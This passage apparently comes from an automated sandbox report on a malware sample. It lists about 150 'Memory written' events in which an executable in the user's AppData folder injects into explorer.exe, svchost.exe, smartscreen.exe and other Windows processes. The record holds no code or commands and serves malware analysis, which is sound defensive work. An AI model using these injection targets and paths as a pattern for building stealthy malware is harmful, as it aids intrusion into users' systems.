                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\ctfmon.exe base: A91BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\explorer.exe base: C350000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\explorer.exe base: C391778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\explorer.exe base: C39178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\explorer.exe base: C391BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\explorer.exe base: C391BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: D40000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: D81778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: D8178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: D81BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: D81BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B50000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B91778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B9178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B91BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B91BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 110000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 151778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 15178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 151BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 151BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: A90000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AD1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AD178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AD1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AD1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AB0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AF1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AF178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AF1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AF1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\smartscreen.exe base: 290000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2D1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2D178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2D1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2D1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 580000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5C1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5C178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5C1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5C1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 3D0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 411778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 41178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 411BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 411BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 900000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 941778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 94178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 941BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 941BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 180000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1C1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1C178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1C1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1C1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A10000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A51778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A5178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A51BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A51BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 190000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F10000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F51778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F5178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F51BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F51BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 10000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 51778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 5178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 51BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 51BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: FB0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: FF1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: FF178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: FF1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: FF1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\dllhost.exe base: AC0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\dllhost.exe base: B01778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\dllhost.exe base: B0178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\dllhost.exe base: B01BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\dllhost.exe base: B01BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\conhost.exe base: 30000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\conhost.exe base: 71778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\conhost.exe base: 7178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\conhost.exe base: 71BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\conhost.exe base: 71BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: E20000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: E61778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: E6178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: E61BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: E61BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 810000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 851778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 85178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 851BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 851BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: EE0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: F21778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: F2178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: F21BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: F21BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2990000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29D1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29D178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29D1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29D1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E30000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E71778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E7178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E71BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E71BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2530000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2571778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 257178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2571BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2571BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E50000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E91778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E9178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E91BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E91BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2400000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2441778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 244178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2441BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2441BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25D0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2611778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 261178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2611BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2611BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CA0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CE1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CE178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CE1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CE1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: C90000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: CD1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: CD178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: CD1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: CD1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F50000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F91778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F9178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F91BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F91BF4Jump to behavior
